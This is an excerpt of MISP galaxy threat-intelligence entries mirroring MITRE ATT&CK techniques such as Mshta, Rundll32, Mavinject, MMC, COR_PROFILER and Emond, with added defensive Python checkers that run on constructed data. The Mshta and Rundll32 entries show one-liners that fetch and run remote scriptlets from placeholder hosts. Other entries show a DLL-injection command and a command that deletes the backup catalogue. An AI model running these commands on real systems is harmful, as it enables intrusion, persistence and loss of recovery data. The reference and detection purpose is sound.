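The export-name behaviour described above (W suffix tried first, then A, then the bare name, or selection by <code>#ordinal</code>) is what makes a command line misleading: the function an analyst reads is not necessarily the one that runs. The following is an added example, not code from the MISP galaxy or from ATT&CK; it models that resolution order against a constructed export table for a hypothetical <code>ExampleDLL.dll</code> and parses the two command-line shapes quoted in the entry.

```python
"""rundll32.exe export-name resolution, as described in the Rundll32 entry.

Added example (not part of the MISP galaxy or of ATT&CK). The export table and
command lines are constructed; the resolution order modelled here (W suffix,
then A suffix, then the bare name; '#n' selects by ordinal) is the one the
entry describes.
"""
import re

# Suffix order rundll32.exe tries before settling on the bare name.
SUFFIX_ORDER = ("W", "A", "")

# Constructed export table of a hypothetical ExampleDLL.dll: name -> ordinal.
EXAMPLE_EXPORTS = {
    "ExampleFunctionW": 1,
    "ExampleFunctionA": 2,
    "ExampleFunction": 3,
    "Init": 4,
}

_CMD = re.compile(r'^\s*"?(?:.*\\)?rundll32(?:\.exe)?"?\s+(.+?)\s*$', re.I)
_DLL_FUNC = re.compile(r'^(?:"([^"]+)"|([^\s,]+))\s*,\s*(#\d+|[A-Za-z_]\w*)')


def resolve_export(exports, requested):
    """Return (export_name, ordinal) that rundll32.exe would call, or None."""
    requested = requested.strip()
    if requested.startswith("#"):                      # ordinal form: file.dll,#1
        ordinal = int(requested[1:])
        for name, ordn in exports.items():
            if ordn == ordinal:
                return (name, ordn)
        return None
    for suffix in SUFFIX_ORDER:                        # W, then A, then bare name
        candidate = requested + suffix
        if candidate in exports:
            return (candidate, exports[candidate])
    return None


def parse_cmdline(cmdline):
    """Split 'rundll32[.exe] <dll>,<func> ...' into (dll, func).

    Returns None when the command line is not in DLL,function form, e.g. the
    javascript: protocol-handler trick, which carries no DLL token at all.
    """
    m = _CMD.match(cmdline)
    if not m:
        return None
    rest = m.group(1)
    if rest.lower().startswith(("javascript:", "vbscript:")):
        return None
    m2 = _DLL_FUNC.match(rest)
    if not m2:
        return None
    return (m2.group(1) or m2.group(2), m2.group(3))


def shadowed_exports(exports):
    """Bare export names rundll32.exe would never call because a W or A variant
    exists; these are the names an analyst would wrongly inspect."""
    return sorted(n for n in exports if n + "W" in exports or n + "A" in exports)


def explain(exports, cmdline):
    """Tie a command line to the export that actually runs."""
    parsed = parse_cmdline(cmdline)
    if parsed is None:
        return None
    dll, requested = parsed
    hit = resolve_export(exports, requested)
    return {"dll": dll, "requested": requested,
            "called": hit[0] if hit else None,
            "ordinal": hit[1] if hit else None}


if __name__ == "__main__":
    print(explain(EXAMPLE_EXPORTS, "rundll32.exe ExampleDLL.dll, ExampleFunction"))
    print(shadowed_exports(EXAMPLE_EXPORTS))
```

On a real sample the export table would come from <code>dumpbin /EXPORTS</code> or a PE parser; the point of <code>shadowed_exports</code> is to list every bare name whose W/A sibling would silently take precedence, so the analyst reverses the right function.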

Verclsid - T1218.012

Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before it is used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)

Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running <code>verclsid.exe /S /C {CLSID}</code>, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub)

The tag is: misp-galaxy:mitre-attack-pattern="Verclsid - T1218.012"

Table 6402. Table References

Links

https://attack.mitre.org/techniques/T1218/012

https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5

https://lolbas-project.github.io/lolbas/Binaries/Verclsid/

https://redcanary.com/blog/verclsid-exe-threat-detection/

https://www.winosbite.com/verclsid-exe/

Mavinject - T1218.013

Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)

Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. <code>C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL</code>).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process.

In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its <code>/HMODULE</code> command-line parameter (ex. <code>mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)

The tag is: misp-galaxy:mitre-attack-pattern="Mavinject - T1218.013"

Table 6403. Table References

Links

https://attack.mitre.org/techniques/T1218/013

https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution

https://lolbas-project.github.io/lolbas/Binaries/Mavinject/

https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e

https://reaqta.com/2017/12/mavinject-microsoft-injector/

MMC - T1218.014

Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)

For example, <code>mmc C:\Users\foo\admintools.msc /a</code> will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is <code>mmc gpedit.msc</code>, which will open the Group Policy Editor application window.

Adversaries may use MMC commands to perform malicious tasks. For example, <code>mmc wbadmin.msc delete catalog -quiet</code> deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: <code>wbadmin.msc</code> may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)

Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: <code>mmc.exe -Embedding C:\path\to\test.msc</code>.(Citation: abusing_com_reg)

The tag is: misp-galaxy:mitre-attack-pattern="MMC - T1218.014"

Table 6404. Table References

Links

https://attack.mitre.org/techniques/T1218/014

https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog

https://docs.microsoft.com/en-us/windows/win32/com/clsid-key-hklm

https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/

https://www.ghacks.net/2017/06/10/windows-msc-files-overview/

https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection

COR_PROFILER - T1574.012

Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)

The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)

Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)

The tag is: misp-galaxy:mitre-attack-pattern="COR_PROFILER - T1574.012"

Table 6405. Table References

Links

https://attack.mitre.org/techniques/T1574/012

https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview

https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)

https://github.com/OmerYa/Invisi-Shell

https://offsec.almond.consulting/UAC-bypass-dotnet.html

https://redcanary.com/blog/blue-mockingbird-cryptominer/

https://redcanary.com/blog/cor_profiler-for-persistence/

https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
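The entry describes two ways the CLR finds a profiler DLL: a CLSID in <code>COR_PROFILER</code> resolved through COM registration, or (from .NET Framework 4) a direct path in <code>COR_PROFILER_PATH</code> with no registration at all. The following is an added example, not code from the MISP galaxy or from ATT&CK; it mirrors that lookup against constructed environment and registry snapshots, so a responder can tell from a captured process environment which DLL would have been loaded. One detail the entry does not spell out, added here: the CLR only loads a profiler at all when <code>COR_ENABLE_PROFILING</code> is set to <code>1</code>. The CLSID, paths and "trusted location" prefixes are placeholders.

```python
"""Which DLL would the .NET Framework CLR load as a COR_PROFILER?

Added example for the COR_PROFILER entry (not part of the MISP galaxy or of
ATT&CK). Environment and registry snapshots are constructed dicts so this runs
anywhere; on a live host they would come from the process environment block
and from winreg (HKCR\\CLSID\\{clsid}\\InprocServer32).
"""
ENABLE_VAR = "COR_ENABLE_PROFILING"   # must be "1" or the CLR skips profiling
CLSID_VAR = "COR_PROFILER"            # CLSID of the profiler COM class
PATH_VAR = "COR_PROFILER_PATH"        # .NET 4+: explicit DLL path, no registration

# Constructed CLSID and paths; the GUID is a placeholder, not a real profiler.
FAKE_CLSID = "{00000000-0000-0000-0000-00000000c0de}"
HKCR_CLSID_SNAPSHOT = {   # {CLSID: InprocServer32 default value}
    FAKE_CLSID.upper(): r"C:\ProgramData\Profiler\registered.dll",
}
ENV_REGISTERED = {ENABLE_VAR: "1", CLSID_VAR: FAKE_CLSID}
ENV_PATH_ONLY = {ENABLE_VAR: "1", CLSID_VAR: FAKE_CLSID,
                 PATH_VAR: r"C:\Users\Public\unregistered.dll"}
ENV_DISABLED = {CLSID_VAR: FAKE_CLSID, PATH_VAR: r"C:\Users\Public\unregistered.dll"}


def resolve_profiler(env, hkcr_clsid):
    """Return the profiler DLL path the CLR would load, or None.

    env         effective environment of the .NET process (system, user and
                process scopes already merged, as the process itself sees them)
    hkcr_clsid  {CLSID: InprocServer32 path} for registered COM servers
    """
    if env.get(ENABLE_VAR, "").strip() != "1":
        return None
    clsid = env.get(CLSID_VAR, "").strip()
    if not clsid:
        return None                       # a CLSID is required even with a path
    path = env.get(PATH_VAR, "").strip()
    if path:
        return path                       # .NET 4+: registry never consulted
    return hkcr_clsid.get(clsid.upper())  # otherwise CLSID -> InprocServer32


def profiler_finding(env, hkcr_clsid, trusted_prefixes=(r"C:\Program Files",)):
    """Summarise the profiler configuration as a triage record.

    trusted_prefixes is a heuristic (assumption): admin-writable install
    locations; anything else is worth a closer look.
    """
    dll = resolve_profiler(env, hkcr_clsid)
    if dll is None:
        return None
    trusted = dll.lower().startswith(tuple(p.lower() for p in trusted_prefixes))
    source = "COR_PROFILER_PATH" if env.get(PATH_VAR) else "CLSID registration"
    return {"dll": dll, "source": source, "trusted_location": trusted}


if __name__ == "__main__":
    for name, env in (("registered", ENV_REGISTERED), ("path-only", ENV_PATH_ONLY),
                      ("disabled", ENV_DISABLED)):
        print(name, profiler_finding(env, HKCR_CLSID_SNAPSHOT))
```

Because the path form needs no registry write, a hunt that only looks for new CLSID registrations misses it; the environment variables of the hijacked process (or the Registry <code>Environment</code> keys for system/user scope) are the artefact to collect.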

KernelCallbackTable - T1574.013

Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)

An adversary may hijack the execution flow of a process using the <code>KernelCallbackTable</code> by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) or [Process Injection](https://attack.mitre.org/techniques/T1055) into another process.

A pointer to the memory address of the <code>KernelCallbackTable</code> can be obtained by locating the PEB (ex: via a call to the <code>NtQueryInformationProcess()</code> [Native API](https://attack.mitre.org/techniques/T1106) function).(Citation: NtQueryInformationProcess) Once the pointer is located, the <code>KernelCallbackTable</code> can be duplicated, and a function in the table (e.g., <code>fnCOPYDATA</code>) set to the address of a malicious payload (ex: via <code>WriteProcessMemory()</code>). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.(Citation: Lazarus APT January 2022)

The tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the <code>KernelCallbackTable</code> may also be restored to its original state by the rest of the malicious payload.(Citation: Lazarus APT January 2022) Use of the <code>KernelCallbackTable</code> to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="KernelCallbackTable - T1574.013"

Table 6406. Table References

Links

https://attack.mitre.org/techniques/T1574/013

https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/

https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess

https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/

https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/

Emond - T1546.014

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place.

The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at <code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)

Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system startup or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.

The tag is: misp-galaxy:mitre-attack-pattern="Emond - T1546.014"

Table 6407. Table References

Links

http://www.magnusviri.com/Mac/what-is-emond.html

https://attack.mitre.org/techniques/T1546/014

https://www.sentinelone.com/blog/how-malware-persists-on-macos/

https://www.xorrior.com/emond-persistence/
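Because emond rules are ordinary plists, auditing them for persistence is a matter of parsing every file under <code>/etc/emond.d/rules/</code> and listing enabled rules whose actions run a command. The following is an added example, not code from the MISP galaxy or from ATT&CK. The rule file is constructed; its key names (<code>name</code>, <code>enabled</code>, <code>eventTypes</code>, and <code>actions</code> entries with <code>type</code>, <code>command</code>, <code>user</code>) follow the rule format shown in the write-ups the entry cites, and the paths are the ones the entry names.

```python
"""Audit emond rule plists for command-running actions.

Added example for the Emond entry (not part of the MISP galaxy or of ATT&CK).
The rule file below is constructed; key names follow the format shown in the
cited write-ups.
"""
import plistlib
from pathlib import Path

RULES_DIR = "/etc/emond.d/rules"                 # emond loads *.plist from here
QUEUE_DIR = "/private/var/db/emondClients"       # QueueDirectories trigger path

SAMPLE_RULE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
  <dict>
    <key>name</key><string>updater</string>
    <key>enabled</key><true/>
    <key>eventTypes</key><array><string>startup</string></array>
    <key>actions</key>
    <array>
      <dict>
        <key>type</key><string>RunCommand</string>
        <key>command</key><string>/Users/Shared/.update.sh</string>
        <key>user</key><string>root</string>
        <key>arguments</key><array/>
      </dict>
    </array>
  </dict>
  <dict>
    <key>name</key><string>disabled-rule</string>
    <key>enabled</key><false/>
    <key>eventTypes</key><array><string>startup</string></array>
    <key>actions</key>
    <array><dict><key>type</key><string>RunCommand</string><key>command</key><string>/bin/true</string></dict></array>
  </dict>
</array>
</plist>
"""


def audit_rules(plist_bytes, source="<memory>"):
    """Return one finding per enabled RunCommand action in a rules plist."""
    findings = []
    for rule in plistlib.loads(plist_bytes):
        if not rule.get("enabled", False):
            continue                              # disabled rules never fire
        for action in rule.get("actions", []):
            if action.get("type") != "RunCommand":
                continue                          # e.g. mail/log actions
            findings.append({
                "source": source,
                "rule": rule.get("name"),
                "events": list(rule.get("eventTypes", [])),
                "command": action.get("command"),
                "user": action.get("user", "root"),   # emond itself runs as root
            })
    return findings


def audit_host(rules_dir=RULES_DIR, queue_dir=QUEUE_DIR):
    """Live macOS check: rules on disk plus whether emond would start at all."""
    findings = []
    for path in sorted(Path(rules_dir).glob("*.plist")):
        findings.extend(audit_rules(path.read_bytes(), str(path)))
    queue = Path(queue_dir)
    armed = queue.is_dir() and any(queue.iterdir())   # needs at least one file
    return {"emond_armed": armed, "findings": findings}


if __name__ == "__main__":
    for f in audit_rules(SAMPLE_RULE_PLIST):
        print(f)
```

A rule pointing at a script in a user-writable location, or any rule at all on a host where <code>/private/var/db/emondClients</code> has recently gained a file, is what an investigator should chase; the combination of those two facts is what arms the persistence.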

Rc.common - T1163

During the boot process, macOS executes <code>source /etc/rc.common</code>, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.

Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).

The tag is: misp-galaxy:mitre-attack-pattern="Rc.common - T1163"

Table 6408. Table References

Links

https://attack.mitre.org/techniques/T1163

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Regsvcs/Regasm - T1121

Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)

Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: <code>[ComRegisterFunction]</code> or <code>[ComUnregisterFunction]</code> respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)

The tag is: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1121"

Table 6409. Table References

Links

https://attack.mitre.org/techniques/T1121

https://lolbas-project.github.io/lolbas/Binaries/Regasm/

https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/

https://msdn.microsoft.com/en-us/library/04za0hca.aspx

https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx

Proxy - T1090

Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.

Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.

The tag is: misp-galaxy:mitre-attack-pattern="Proxy - T1090"

Table 6410. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1090

Rootkit - T1014

Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)

Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)

The tag is: misp-galaxy:mitre-attack-pattern="Rootkit - T1014"

Table 6411. Table References

Links

http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf

https://attack.mitre.org/techniques/T1014

https://en.wikipedia.org/wiki/Rootkit

https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/

https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf

Mshta - T1170

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension <code>.hta</code>. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)

Adversaries can use mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)

Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>

They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>

Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer’s security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)

The tag is: misp-galaxy:mitre-attack-pattern="Mshta - T1170"

Table 6412. Table References

Links

https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/

https://attack.mitre.org/techniques/T1170

https://en.wikipedia.org/wiki/HTML_Application

https://lolbas-project.github.io/lolbas/Binaries/Mshta/

https://msdn.microsoft.com/library/ms536471.aspx

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/

Screensaver - T1180

Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in <code>C:\Windows\System32\</code>, and <code>C:\Windows\sysWOW64\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations.

The following screensaver settings are stored in the Registry (<code>HKCU\Control Panel\Desktop\</code>) and could be manipulated to achieve persistence:

  • <code>SCRNSAVE.exe</code> - set to malicious PE path

  • <code>ScreenSaveActive</code> - set to '1' to enable the screensaver

  • <code>ScreenSaverIsSecure</code> - set to '0' to not require a password to unlock

  • <code>ScreenSaveTimeout</code> - sets user inactivity timeout before screensaver is executed

Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Screensaver - T1180"

Table 6413. Table References

Links

https://attack.mitre.org/techniques/T1180

https://en.wikipedia.org/wiki/Screensaver

https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf
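The four Registry values listed above are all an investigator needs to judge a screensaver configuration, but the path comparison has to be done carefully: <code>SCRNSAVE.EXE</code> may be a <code>REG_EXPAND_SZ</code> with <code>%SystemRoot%</code>, and a path like <code>C:\Windows\System32\..\..\Users\Public\x.scr</code> must not pass as a system location. The following is an added example, not code from the MISP galaxy or from ATT&CK; the Registry snapshots are constructed and, on a live host, would be read with <code>winreg</code>.

```python
"""Screensaver persistence check against HKCU\\Control Panel\\Desktop.

Added example for the Screensaver entry (not part of the MISP galaxy or of
ATT&CK). Registry values are constructed dicts; the check normalises case,
expands %VAR% references and collapses '..' before comparing paths.
"""
import ntpath
import re

ALLOWED_SUBDIRS = ("System32", "SysWOW64")   # where Windows' own .scr files live


def _expand(value, env):
    """Expand %NAME% against env (upper-case keys); an offline stand-in for
    ExpandEnvironmentStrings. Unknown names are left untouched."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), value)


def check_screensaver(values, env):
    """values: {value name: data} from HKCU\\Control Panel\\Desktop
    env:    {"SYSTEMROOT": r"C:\\Windows", ...}
    Returns a list of human-readable findings (empty means nothing unusual)."""
    v = {k.lower(): str(d) for k, d in values.items()}   # value names are case-insensitive
    findings = []
    exe = v.get("scrnsave.exe")
    if exe:
        path = ntpath.normcase(ntpath.normpath(_expand(exe, env)))
        allowed = tuple(ntpath.normcase(ntpath.join(env["SYSTEMROOT"], d)) + "\\"
                        for d in ALLOWED_SUBDIRS)
        if not path.startswith(allowed):
            findings.append(f"SCRNSAVE.EXE points outside System32/SysWOW64: {exe}")
        if not path.endswith(".scr"):
            findings.append(f"SCRNSAVE.EXE is not a .scr file: {exe}")
    if v.get("screensaveactive") == "1" and v.get("screensaverissecure") == "0":
        findings.append("screensaver is active but will not lock the session")
    return findings


# Constructed snapshots: one stock configuration, one matching the entry's pattern.
ENV = {"SYSTEMROOT": r"C:\Windows"}
BENIGN = {"SCRNSAVE.EXE": r"%SystemRoot%\System32\scrnsave.scr",
          "ScreenSaveActive": "1", "ScreenSaverIsSecure": "1", "ScreenSaveTimeOut": "600"}
PERSISTENCE = {"SCRNSAVE.EXE": r"C:\Windows\System32\..\..\Users\Public\update.scr",
               "ScreenSaveActive": "1", "ScreenSaverIsSecure": "0", "ScreenSaveTimeOut": "60"}

if __name__ == "__main__":
    print("benign:", check_screensaver(BENIGN, ENV))
    print("persistence:", check_screensaver(PERSISTENCE, ENV))
```

A short <code>ScreenSaveTimeOut</code> on its own is not evidence, which is why the check does not flag it; a binary outside the system directories, or an active screensaver that does not lock, is what warrants pulling the referenced file.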

Rundll32 - T1085

The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.

Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)

The tag is: misp-galaxy:mitre-attack-pattern="Rundll32 - T1085"

Table 6414. Table References

Links

https://attack.mitre.org/techniques/T1085

https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
